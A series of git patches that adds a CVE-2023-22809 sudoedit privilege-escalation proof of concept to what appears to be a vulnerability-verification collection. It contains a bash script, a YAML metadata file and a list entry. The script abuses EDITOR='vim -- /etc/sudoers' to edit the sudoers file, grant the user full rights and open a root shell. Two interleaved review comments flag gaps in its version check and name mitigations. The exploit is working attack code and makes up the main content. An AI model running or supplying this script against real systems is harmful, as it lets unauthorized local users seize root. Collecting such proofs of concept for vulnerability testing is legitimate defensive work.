From f966c1d3300baf1cd9b2029a1aa81b4e93e24132 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:47:45 +0000 Subject: [PATCH 01/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202023?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/.keep diff --git a/cve/sudo/2023/.keep b/cve/sudo/2023/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From bfbfe22994d4c4cf75e39bbfe700f8b82730c69a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:11 +0000 Subject: [PATCH 02/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20taml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/taml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/taml/.keep diff --git a/cve/sudo/2023/taml/.keep b/cve/sudo/2023/taml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 529eee531236d6e21fb374a051c5cfc33e40374f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:26 +0000 Subject: [PATCH 03/12] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/sudo/20?= =?UTF-8?q?23/taml=20=E4=B8=BA=20cve/sudo/2023/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/{taml => yaml}/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/sudo/2023/{taml => yaml}/.keep (100%) diff --git a/cve/sudo/2023/taml/.keep b/cve/sudo/2023/yaml/.keep similarity index 100% rename from cve/sudo/2023/taml/.keep rename to cve/sudo/2023/yaml/.keep -- Gitee From d9e65e876434ac35099473c14c2fb433a831c01d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:35 +0000 Subject: [PATCH 04/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/.keep diff --git a/cve/sudo/2023/.keep b/cve/sudo/2023/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f566ba408ce2dd237eeb6d92bbce0d3558902a9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:48:50 +0000 Subject: [PATCH 05/12] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2023-22809?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/CVE-2023-22809/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/CVE-2023-22809/.keep diff --git a/cve/sudo/2023/CVE-2023-22809/.keep b/cve/sudo/2023/CVE-2023-22809/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From c5d4cfbbaa24633e3770dd4ab8fb65e7e984621d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:49:17 +0000 Subject: [PATCH 06/12] add cve/sudo/2023/CVE-2023-22809. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh diff --git a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh new file mode 100644 index 00000000..e69de29b -- Gitee From 5d4033a947773a7bc11b7cd09ea7b356e5558486 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:50:29 +0000 Subject: [PATCH 07/12] update cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- .../2023/CVE-2023-22809/CVE-2023-22809.sh | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+)
diff --git a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh
index e69de29b..040199d3 100644
--- a/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh
+++ b/cve/sudo/2023/CVE-2023-22809/CVE-2023-22809.sh
@@ -0,0 +1,41 @@
+#!/usr/bin/env bash
+#
+# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
+#
+# Exploit Author: n3m1.sys
+# CVE: CVE-2023-22809
+# Date: 2023/01/21
+# Vendor Homepage: https://www.sudo.ws/
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
+# Version: 1.8.0 to 1.9.12p1
+# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
+#
+# Running this exploit on a vulnerable system allows a localiattacker to gain
+# a root shell on the machine.
+#
+# The exploit checks if the current user has privileges to run sudoedit or
+# sudo -e on a file as root. If so it will open the sudoers file for the
+# attacker to add a line to gain privileges on all the files and get a root
+# shell.
+
+if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
+then
+ echo "> Currently installed sudo version is not vulnerable"
+ exit 1
+fi
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)
+
+if [ -z "$EXPLOITABLE" ]; then
+ echo "> It doesn't seem that this user can run sudoedit as root"
+ read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
+else
+ echo "> BINGO! User exploitable"
+fi
+
+echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
+echo "$USER ALL=(ALL:ALL) ALL"
+read -n 1 -s -r -p "Press any key to continue..."
+EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
+sudo su root
+exit 0
\ No newline at end of file
-- Gitee From bb46cc2f21305230be80243d4f739a3b0fc0eadf Mon Sep 17 00:00:00 2001 
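Review bot: The version gate at the top of the script (`grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'`) prints "not vulnerable" for sudo 1.9.10 and for plain 1.9.12, both of which fall inside the 1.8.0 to 1.9.12p1 range stated in the header, because `[0-9]1?` only accepts a one-digit patch level or one ending in 1. The check also relies on the upstream version string alone, so a distribution package that backported the fix without changing that string would presumably be reported as vulnerable. Since the output is read as a verdict on the host, I would document the limit beside the check, e.g. `# version-string match only: misses 1.9.10 and 1.9.12 and cannot see distro backports; confirm against the package changelog`. The header block would also be more useful to whoever triages the result if it named the fixed release, 1.9.12p2 per the affected range given in this series' YAML.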
From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:50:48 +0000 Subject: [PATCH 08/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/CVE-2023-22809/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/CVE-2023-22809/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/CVE-2023-22809/.keep diff --git a/cve/sudo/2023/CVE-2023-22809/.keep b/cve/sudo/2023/CVE-2023-22809/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 517893175f4f7238fe483b2478e0afa89d513982 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:51:29 +0000 Subject: [PATCH 09/12] add cve/sudo/2023/yaml/CVE-2023-22809.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 45 ++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 cve/sudo/2023/yaml/CVE-2023-22809.yaml diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml new file mode 100644 index 00000000..d004b67c --- /dev/null +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml 
@@ -0,0 +1,45 @@
+FormatVer: 20230308
+Id: CVE-2023-22809
+Belong: system
+PocHazardLevel: low
+Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
+SiteInfo:
+ Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。
+ Severity: high
+ Description:
+ Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。
+ ScopeOfInfluence:
+ sudo@[1.8.0, 1.9.12p2)
+ References:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-22809
+ SiteClassification:
+ CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ CvssScore: 7.8
+ CveId: CVE-2023-22809
+ CweId: CWE-269
+ CnvdId: None
+ KveId: None
+ Tags:
+ - 特权管理不当
+SiteRequests:
+ Implement:
+ ImArray:
+ - Inter : bash
+ InterArgs :
+ Exec : CVE-2023-22809.sh
+ Args :
+ ExpireTime: #second
+
+ # < input
+ # > output
+ # . wait
+ # ? condition
+ # : content
+ #
+ #组合起来
+ # >. 等待直到输出
+ # << 输入字符
+ # >?判断条件
+ Inter:
+ - ">?:BINGO! User exploitable" #ture
+ Condition: None
\ No newline at end of file
-- Gitee From 57340027136f2325d777a75c1ea3f9e5da56df96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:51:40 +0000 Subject: [PATCH 10/12] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/sudo/2023/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/sudo/2023/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/sudo/2023/yaml/.keep
diff --git a/cve/sudo/2023/yaml/.keep b/cve/sudo/2023/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee From 499ed225239a6a6e2ebca7a662d64bba6a6d08bd Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:53:56 +0000 Subject: [PATCH 11/12] update cve/sudo/2023/yaml/CVE-2023-22809.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- cve/sudo/2023/yaml/CVE-2023-22809.yaml | 59 ++++++++------------------ 1 file changed, 17 insertions(+), 42 deletions(-) diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index d004b67c..8fad7320 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml 
@@ -1,45 +1,20 @@ -FormatVer: 20230308 -Id: CVE-2023-22809 -Belong: system -PocHazardLevel: low -Source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc -SiteInfo: - Name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - Severity: high - Description: +id: CVE-2023-22809 +source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc +info: + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - ScopeOfInfluence: + scope-of-influence: sudo@[1.8.0, 1.9.12p2) - References: + references: - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - SiteClassification: - CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - CvssScore: 7.8 - CveId: CVE-2023-22809 - CweId: CWE-269 - CnvdId: None - KveId: None - Tags: - - 特权管理不当 -SiteRequests: - Implement: - ImArray: - - Inter : bash - InterArgs : - Exec : CVE-2023-22809.sh - Args : - ExpireTime: #second - - # < input - # > output - # . wait - # ? condition - # : content - # - #组合起来 - # >. 等待直到输出 - # << 输入字符 - # >?判断条件 - Inter: - - ">?:BINGO! User exploitable" #ture - Condition: None \ No newline at end of file + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: + - 特权管理不当 \ No newline at end of file -- Gitee From a26e6385a1c1edf77f1da148fd8d875b957d5292 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=98=BB=E5=98=BB?= <862623087@qq.com> Date: Thu, 9 Mar 2023 03:55:47 +0000 Subject: [PATCH 12/12] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 嘻嘻 <862623087@qq.com> --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) 
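Review bot: The `description` in the new layout says only that file names passed after `--` are not filtered; it does not say that the `--` reaches sudoedit through the user-controlled `SUDO_EDITOR`, `VISUAL` or `EDITOR` variables, which is what a defender needs to know to write a detection or a sudoers hardening rule. I would add that to the description together with the remediation: upgrade to 1.9.12p2 or later (the upper bound already given in `scope-of-influence`), or apply the vendor's interim mitigation `Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR"`. `references` lists only the NVD entry, so the sudo.ws advisory for this CVE should be added there. As a point of style, `name` holds a general description of sudo rather than a title for the vulnerability.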
diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 1c5bc747..5133d525 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,7 @@ cve: - CVE-2022-2588 sudo: - CVE-2021-3156 + - CVE-2023-22809 gitlab: - CVE-2021-22205 confluence: -- Gitee